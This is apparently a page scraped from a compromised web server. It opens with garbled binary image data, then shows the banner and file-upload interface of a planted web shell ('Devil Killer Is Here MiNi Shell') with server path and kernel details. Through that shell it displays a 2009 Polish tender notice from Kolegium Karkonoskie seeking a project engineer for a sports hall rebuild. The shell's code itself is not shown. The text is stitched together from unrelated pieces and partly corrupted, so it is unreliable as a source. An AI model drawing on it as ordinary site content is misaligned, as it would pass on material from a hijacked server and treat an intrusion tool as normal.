JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/104666-N-2009.html

<p class="kh_header"><b>Jelenia Góra: Inżynier projektu dla zadania: Przebudowa i rozbudowa hali sportowej zlokalizowanej w kompleksie uczelnianym Kolegium Karkonoskiego w Jeleniej Górze przy ul. Lwóweckiej 18.</b><br>
<b>Numer ogłoszenia: 104666 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kolegium Karkonoskie (Państwowa Wyższa Szkoła Zawodowa) , ul. Lwówecka 18, 58-503 Jelenia Góra, woj. dolnośląskie, tel. 075 6453318, faks 075 6453324, 6453310.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kk.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inżynier projektu dla zadania: Przebudowa i rozbudowa hali sportowej zlokalizowanej w kompleksie uczelnianym Kolegium Karkonoskiego w Jeleniej Górze przy ul. Lwóweckiej 18..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Pełnienie funkcji Inżyniera (Inżyniera Projektu) przy realizacji Projektu pn.:Przebudowa i rozbudowa hali sportowej zlokalizowanej w kompleksie uczelnianym Kolegium Karkonoskiego w Jeleniej Górze przy ul. Lwóweckiej 18, 
tj. nadzór budowlany nad prawidłową realizacją kontraktu i rozliczania projektu oraz sprawozdawczości.
Obiekt hali sportowej będzie posiadał następujące parametry: 
kubatura 18.380 m3
powierzchnia całkowita 2.823 m2

1.Zamawiający informuje, że zamówienie dotyczy projektu pod nazwą: Przebudowa 
i rozbudowa hali sportowej zlokalizowanej w kompleksie uczelnianym Kolegium Karkonoskiego w Jeleniej Górze przy ul. Lwóweckiej 18, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 
w ramach Priorytetu VII,  Działanie 7.1 Rozwój infrastruktury szkolnictwa wyższego.
2.Zamawiający informuje, że mocą podpisanej umowy z Inżynierem przekaże odpowiedzialność oraz pełnomocnictwa do bezpośredniego monitorowania 
i nadzorowania realizacji robót w zakresie określonym dokumentacją projektową, zgodnie z procedurą obowiązującą przy realizacji inwestycji w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013 (RPO WD), umową o dofinansowanie projektu oraz warunkami ustalonymi w umowie zawartej z wykonawcą robót budowlanych i w umowie zawartej z dostawcą wyposażenia.
3.Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności i przedstawił na dzień zawarcia umowy jako załącznik polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, o wartości nie mniejszej niż wartość ceny ofertowej zamówienia, na czas obejmujący okres realizacji zamówienia.
4.Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę 
w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
5.W przypadku dostarczenia zabezpieczenia należytego wykonania umowy w formie gwarancji, Zamawiający wymaga, aby była ona zgodna z wzorem stanowiącym ZAŁĄCZNIK NR 6 do SIWZ.
6.Zamawiający informuje, że do obowiązków Inżyniera będzie należało:
a)zapoznanie się z dokumentacją projektową stanowiącą ZAŁĄCZNIK NR 7 do SIWZ.
b)uczestnictwo w przygotowaniu i weryfikacji ewentualnej dodatkowo opracowanej dokumentacji projektowo-kosztorysowej, niezbędnej do prawidłowego wykonania Projektu,
c)uczestnictwo w przygotowaniu i przeprowadzeniu przetargu na roboty budowlano-montażowe oraz na dostawę wyposażenia,
d)uczestnictwo w przygotowaniu i przeprowadzeniu wyboru audytora zewnętrznego zgodnie z Wytycznymi programowymi Instytucji Zarządzającej RPO WD 
w zakresie ogólnych zasad przeprowadzania audytu zewnętrznego projektu 
w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013,
e)przygotowywanie i dostarczanie Zamawiającemu wszelkich informacji związanych z realizacją inwestycji wymaganych przez Instytucję Zarządzającą zgodnie 
z umową o dofinansowanie projektu oraz przepisami Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,
f)przygotowywanie i dostarczanie Zamawiającemu wszelkich informacji związanych z realizacją inwestycji wymaganych przez Audytora Zewnętrznego zgodnie
 z Wytycznymi programowymi Instytucji Zarządzającej RPO WD 
w zakresie ogólnych zasad przeprowadzania audytu zewnętrznego projektu 
w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013,
g)kierowanie realizacją Projektu,
h)zapewnienie codziennej obecności nadzoru na placu budowy tj. obecności Inżyniera lub jego Pełnomocnika (osoby uprawnionej) zdolnego do podejmowania decyzji,
i)koordynowanie współpracy pomiędzy wykonawcą robót budowlanych a dostawcą wyposażenia,
j)rozwiązywanie problemów i sporów powstałych w czasie realizacji projektu,
k)wykonywanie zadań:
- inspektora nadzoru inwestorskiego, zgodnie z art. 25, 26 Prawa budowlanego,
- koordynatora czynności nadzoru inwestorskiego, zgodnie z art. 27 Prawa budowlanego,
- inwestora, zgodnie z art. 18 Prawa budowlanego,
l)informowanie na piśmie Zamawiającego o wszystkich faktach mających znaczenie dla realizacji Projektu, 
m)zorganizowanie i prowadzenie biura Inżyniera,
n)obsługa okresu gwarancyjnego zadania inwestycyjnego z tytułu gwarancji jakości i rękojmi,
o)przygotowanie dokumentacji odbiorowej,
p)przygotowanie dokumentacji do uzyskania pozwolenia na użytkowanie obiektu,
q)współpraca z projektantami w zakresie obsługi nadzoru autorskiego.

Zakres zamówienia:
1)zgodnie z wymaganiami Zamawiającego Inżynier zobowiązany jest do zapoznania się z dokumentacją projektową, o której mowa w pkt III. 6.a) SIWZ,
2)Inżynier zobowiązany jest do uczestniczenia w przygotowaniu ewentualnej dodatkowo opracowanej dokumentacji projektowo-kosztorysowej, niezbędnej do prawidłowego wykonania Projektu,
3)w terminie 10 dni od podpisania umowy Inżynier uzgodni z Zamawiającym wzory wszystkich dokumentów, które będą miały zastosowanie w trakcie realizacji projektu,
4)w ciągu 10 dni od otrzymania od wykonawcy robót budowlanych harmonogramów finansowego i rzeczowego, Inżynier przedłoży Zamawiającemu swoją ocenę ww. harmonogramów,
5)Inżynier ma prowadzić nadzór inwestorski we wszystkich aspektach zgodnie 
z ustawą z dnia 07 lipca 1994 r. Prawo budowlane,
6)Inżynier będzie monitorował postępy w realizacji projektu zgodnie
 z  dokumentacją projektową oraz zatwierdzonymi harmonogramami, 
7)Inżynier sprawdzi, czy wszystkie osoby zatrudnione przez Wykonawcę robót budowlanych posiadają odpowiednie kwalifikacje oraz uprawnienia do prowadzenia robót budowlanych,
8)Inżynier sprawdzi, czy wszystkie używane urządzenia i materiały posiadają świadectwa i certyfikaty wymagane umową (projektem),
9)Inżynier ma obowiązek sprawdzić ważność ubezpieczeń osób zatrudnionych oraz używanego sprzętu,
10)Inżynier będzie odpowiedzialny za sprawdzanie i uaktualnianie harmonogramów finansowego i rzeczowego inwestycji, jak również kontrolowanie przepływów finansowych zgodnie z harmonogramem robót,
11)Inżynier będzie kontrolował co miesiąc postęp wykonania robót w stosunku do zatwierdzonych harmonogramów,
12)Inżynier ma obowiązek składania comiesięcznych sprawozdań z przebiegu realizacji zadania, począwszy od następnego miesiąca kalendarzowego po podpisaniu umowy,
13)Inżynier ma obowiązek sporządzania raportów z przebiegu realizacji projektu, zgodnie z procedurą obowiązującą przy realizacji inwestycji w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013,
14)Inżynier jest odpowiedzialny za przedkładanie Zamawiającemu wszystkich raportów, oświadczeń i zapytań dostarczanych przez Wykonawcę robót budowlanych oraz Wykonawcę dostawy i montażu wyposażenia,
15)Inżynier jest odpowiedzialny za wypełnianie wszystkich obowiązków, przygotowywanie dokumentów i sprawozdań oraz współpracę z Instytucją Zarządzającą wynikających z umowy o dofinansowanie projektu oraz przepisów Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013, a także za przygotowanie i dostarczenie dla Zamawiającego wszelkich informacji związanych z inwestycją wymaganych przez Instytucję Zarządzającą oraz przez polskie Prawo budowlane,
16)Inżynier jest odpowiedzialny za przygotowywanie wszelkich dokumentów 
i sprawozdań wymaganych przez audytora zewnętrznego,
17)Inżynier jest odpowiedzialny za organizowanie i prowadzenie narad technicznych, problemowych i innych spotkań, które będą odbywały się w razie potrzeby, ale nie rzadziej niż raz na tydzień (w spotkaniach tych powinny uczestniczyć wszystkie strony zaangażowane w realizację inwestycji),
18)Inżynier będzie brał udział w spotkaniach organizowanych przez Zamawiającego,
19)Inżynier jest zobligowany do udzielania regularnych konsultacji i doradztwa technicznego Zamawiającemu,
20)Inżynier inicjuje zmiany do zakresu robót budowlanych objętych projektem na roboty budowlane przez wydanie polecenia lub żądanie skierowane do Wykonawcy, aby przedłożył ofertę na zmianę (wszystkie zmiany, w tym także roboty dodatkowe, powinny pozostawać w ścisłym związku z zakresem projektu na roboty budowlane, a ich wprowadzenie powinno być konieczne dla wykonania całości robót i uzyskania założonego efektu użytkowego),
21)Inżynier jest odpowiedzialny za ocenę, aprobatę, bądź odrzucenie wniosków Wykonawcy robót; wszystkie decyzje mogące wpływać na zakres umowy (projektu), jego czas trwania lub cenę, wymagają zgody Zamawiającego,
22)Inżynier jest odpowiedzialny, w przypadku wystąpienia konieczności wykonania robót dodatkowych lub zamiennych, za uzgodnienie sposobu postępowania
 z Zamawiającym i Wykonawcą robót,
23)Inżynier kontroluje i potwierdza dostarczanie przez Wykonawcę robót sprzętu 
i materiałów wyszczególnionych w projekcie oraz, że wszystkie środki pozostają na placu budowy aż do momentu upoważnienia do ich zwolnienia,
24)Inżynier opiniuje proponowanych przez Wykonawcę robót Podwykonawców
 i w porozumieniu z Zamawiającym wydaje zgodę na ich zatrudnienie; 
w przypadku opinii negatywnej, Inżynier przedstawi Wykonawcy robót pisemne uzasadnienie,
25)Inżynier sprawdza jakość wykonywanych robót, wbudowanych elementów budowlanych, a w szczególności zapobiega zastosowaniu materiałów budowlanych niedopuszczonych do obrotu i stosowania w budownictwie,
26)Inżynier jest zobowiązany do sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, dodatkowo musi uczestniczyć 
w odbiorach częściowych i końcowym, jak również przygotować i brać udział 
w odbiorach gotowych obiektów i konstrukcji,
27)Inżynier wydaje kierownikowi budowy lub kierownikowi robót polecenia potwierdzone wpisem do dziennika budowy dotyczące: wykonania prób, odkrycia robót lub elementów zakrytych, wymagających odkrycia oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
28)Inżynier ma obowiązek zawiesić roboty budowlane w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi, bądź spowodować znaczne straty materialne,
29)Inżynier wystawia świadectwa przeprowadzonych prób lub uznaje świadectwa wystawione przez Wykonawcę robót,
30)Inżynier w uzgodnieniu z Zamawiającym oraz po konsultacjach z Projektantem zatwierdza poprawki do szczegółowej dokumentacji projektowej,
31)Inżynier musi zweryfikować obmiary każdego elementu robót, a przyjęta metodologia musi być zgodna z przedmiarami robót i Specyfikacjami Technicznymi,
32)Inżynier jest odpowiedzialny za otrzymywanie od Wykonawcy robót rozliczeń, do których otrzymania uważa się za uprawnionego, łącznie z dokumentami stanowiącymi podstawę rozliczenia oraz weryfikowanie tych rozliczeń,
33)Inżynier wystawia Zamawiającemu odpowiednie Świadectwo Płatności na każdą płatność dla Wykonawcy robót: dla ostatniej płatności - Ostateczne Świadectwo Płatności, dla wszystkich pozostałych płatności - Przejściowe Świadectwo Płatności,
34)Inżynier weryfikuje, analizuje i zatwierdza do zapłaty faktury wystawione przez Wykonawcę robót w związku z realizacją umowy (projektu) na roboty budowlane,
35)Inżynier ściśle współpracuje z Wydziałem Finansowo - Budżetowym Zamawiającego i dostarcza wszystkie niezbędne, żądane dokumenty, dotyczące rozliczeń,
36)Inżynier uzgadnia z Wykonawcą robót rodzaj dokumentacji powykonawczej, sprawdza ją i zatwierdza w porozumieniu z Zamawiającym,
37)Inżynier zarządza całym procesem przekazania obiektu do użytkowania,
38)Inżynier odbiera roboty od Wykonawcy robót protokołami odbioru częściowego
 i końcowego,
39)Inżynier będzie nadzorował wszystkie próby, wszystkie koszty prób będą pokryte przez Wykonawcę robót, Inżynier przekaże Wykonawcy robót nie później niż 
w ciągu 24 godzin zawiadomienie o zamiarze przeprowadzenia inspekcji lub 
o obecności w czasie prób, Inżynier jest zobowiązany do uczestnictwa w Próbach Końcowych,
40)Inżynier dokona końcowego rozliczenia projektu z uwzględnieniem rozliczenia
 i przekazania środków trwałych,
41)Inżynier, po uzgodnieniu z Zamawiającym wykona wszystkie inne czynności, niewymienione w umowie lub w umowie na roboty, które zostaną uznane za niezbędne dla prawidłowej realizacji inwestycji,
42)Inżynier w ramach swojego budżetu uwzględni koszty osobowe, koszty prowadzenia biura, zakwaterowania dla członków zespołu, koszty delegacji i inne konieczne do prawidłowego działania Inżyniera,
43)Inżynier jest całkowicie odpowiedzialny za odpowiedni dobór zespołu; podczas nieobecności któregokolwiek ze specjalistów, wynikającej z urlopu, zwolnienia lekarskiego lub innej przyczyny, Inżynier zapewni czasowe zastępstwo specjalistów na cały czas nieobecności zatrudnionych fachowców, by uniknąć zwłoki w realizacji robót budowlanych (takie czasowe zastępstwo będzie przedłożone z wyprzedzeniem na piśmie, łącznie z CV proponowanych osób, do aprobaty Zamawiającego),
44)Inżynier musi posiadać zdolności osobowe i techniczne do rozliczania kosztów realizowanych robót, dokonywanych płatności, gwarancji oraz ubezpieczeń,
45)Inżynier jest zobowiązany do prowadzenia rejestru robót zawierającego m.in.:
a)polecenia dla Wykonawcy robót,
b)szczegółowe raporty dotyczące elementów wykonanych robót pod względem ilości i jakości oraz zrealizowanych i wykorzystanych dostaw, nadających się do sprawdzenia na budowie i stosowanych przy naliczaniu płatności należnych Wykonawcy robót,
46)Inżynier zobowiązany będzie do odbywania badań i inspekcji w miejscach wytwarzania elementów, komponentów oraz materiałów, jeżeli zajdzie taka potrzeba lub jeżeli takowe są wyszczególnione w Specyfikacjach Technicznych,
47)Inżynier będzie zarządzał i nadzorował realizację projektu w przedstawionym zakresie, będzie niezależny, aczkolwiek w zakresie wszystkich swoich zadań
 i obowiązków wyszczególnionych wyżej, będzie podlegał Zamawiającemu; będzie odpowiedzialny bezpośrednio przed Zamawiającym za realizację swoich zadań;
Inżynier - jako podmiot - dysponować będzie kadrą wysokokwalifikowanych specjalistów, którymi kierować będzie bezpośrednio Inżynier; wewnętrzny regulamin zespołu określi Inżynier; Zamawiający będzie zatwierdzać wszelkie raporty i oceny przygotowane przez Inżyniera; Inżynier będzie konsultować istotne z punktu widzenia realizacji Projektu decyzje z wydelegowanymi w danej branży członkami Zamawiającego (jeżeli wymagać tego będzie waga problemu - z całym zespołem Zamawiającego na nadzwyczajnych zebraniach); zebrania zespołu Zamawiającego i Inżyniera w celu omówienia bieżących spraw związanych z realizacją inwestycji odbywać się będą minimum raz na tydzień,
48)Inżynier będzie opiniował, opracowywał dla Zamawiającego takie materiały, jak np.: informacje dla prasy i władz lokalnych, opiniowanie na temat dokumentacji przedkładanej Zamawiającemu do uzgodnienia, uczestniczył w spotkaniach 
i naradach organizowanych przez różne instytucje w sprawie budowy (na czas nieobecności Inżynier zobowiązany jest wyznaczyć zastępstwo 
z powiadomieniem Zamawiającego na piśmie, z odpowiednim wyprzedzeniem),
49)działalność Inżyniera obejmuje również okres gwarancji jakości i rękojmi, wynikających z zapisów zawartych w umowie na realizację robót, Inżynier zorganizuje przeglądy gwarancyjne i będzie nadzorował usuwanie stwierdzonych protokolarnie wad i usterek,
50)Inżynier nie ma prawa zaciągać zobowiązań finansowych, w stosunku do Wykonawcy robót, autorów dokumentacji projektowo-kosztorysowej oraz innych uczestników procesu inwestycyjnego, wykraczających poza kwoty zawarte 
w umowach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca  jest zobowiązany przed upływem terminu składania ofert do wniesienia wadium w wysokości 12.000,00 zł (słownie zł : dwanaście tysięcy)
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na następujący rachunek  bankowy: BZ WBK I O Jelenia Góra nr  63 1090 1926 0000 0005 1400 5977 
z dopiskiem: wadium - Inżynier Projektu.
4. W przypadkach określonych w pkt- cie 2. ppkt 2)-5) wadium winno być złożone w kasie, w siedzibie Zamawiającego - Kolegium Karkonoskiego w Jeleniej Górze ul. Lwówecka 18, budynek Nr 1 - Rektorat pok. 108. z zaznaczeniem: wadium - Inżynier Projektu, w godz.: od 8 do14-tej.
5.Zwrot lub utrata wadium zostaną wykonane zgodnie z art. 46 ustawy Prawo zamówień publicznych (Dz.U. Nr 19 poz. 177 z 2004r z późn. zm.).
6. Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Warunkiem udziału w postępowaniu jest:
a) wykazanie wykonania w sposób należyty w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie, co najmniej 1 usługi odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj. polegającej na pełnieniu nadzoru inwestorskiego dla inwestycji polegającej na budowie lub przebudowie obiektu kubaturowego o wartości robót budowlanych minimum 8 000 000,00 zł brutto finansowanej (lub współfinansowanej) ze środków pomocowych Unii Europejskiej, 

b) dysponowanie następującymi osobami do realizacji zadań związanych 
z przygotowaniem i realizacją projektu:
1).	inżynier, który musi:
-	posiadać wykształcenie wyższe,
-	posiadać minimum 5 lat doświadczenia zawodowego, w tym minimum 3 lata w zakresie zarządzania projektami współfinansowanymi przez Unię Europejską dla robót budowlanych,
2).	inspektor nadzoru inwestorskiego (specjalista ogólnobudowlany), który musi:
-	posiadać wyższe wykształcenie techniczne,
-	posiadać minimum 5 lat doświadczenia zawodowego, w tym 3 lata jako inspektor nadzoru inwestorskiego,
-	posiadać uprawnienia budowlane w specjalności konstrukcyjno - budowlanej, 
-	być członkiem właściwej izby samorządu zawodowego,
3).	inspektor nadzoru inwestorskiego (specjalista drogowy), który musi:
-	posiadać wyższe wykształcenie techniczne,
-	posiadać minimum 5 lat doświadczenia zawodowego, w tym 3 lata jako inspektor nadzoru inwestorskiego,
-	posiadać uprawnienia budowlane w specjalności drogowej,
-	być członkiem właściwej izby samorządu zawodowego,
4).	inspektor nadzoru inwestorskiego (specjalista elektryk), który musi:
-	posiadać minimum 5 lat doświadczenia zawodowego, w tym 3 lata jako inspektor nadzoru inwestorskiego,
-	posiadać uprawnienia budowlane w specjalności instalacyjnej
 w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych,
-	być członkiem właściwej izby samorządu zawodowego,
5).	inspektor nadzoru inwestorskiego (specjalista sanitarny), który musi:
-	posiadać minimum 5 lat doświadczenia zawodowego, w tym 3 lata jako inspektor nadzoru inwestorskiego,
-	posiadać uprawnienia budowlane w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
-	być członkiem właściwej izby samorządu zawodowego,
6).	pracownik ds. rozliczeń projektu i sprawozdawczości, który musi:
-	posiadać wykształcenie wyższe ekonomiczne lub prawnicze,
-	posiadać minimum 5 lat doświadczenia zawodowego, w tym minimum 2 lata w zakresie obsługi projektów współfinansowanych przez Unię Europejską.

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Warunkiem udziału w postępowaniu jest:
a) osiągnięcie średniego rocznego przychodu netto ze sprzedaży i zrównanych z nimi w kwocie minimum 400 000,00 zł za ostatnie 3 latach obrotowe prowadzonej działalności, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie,
b) dysponowanie środkami finansowymi w wysokości co najmniej 100 000,00 zł lub posiadanie zdolności kredytowej w wysokości co najmniej 100 000,00 zł

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.2. oraz 1.3. SIWZ
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.4. SIWZ
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) muszą spełnić warunek wspólnie.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.5., 1.6. i 1.7. SIWZ
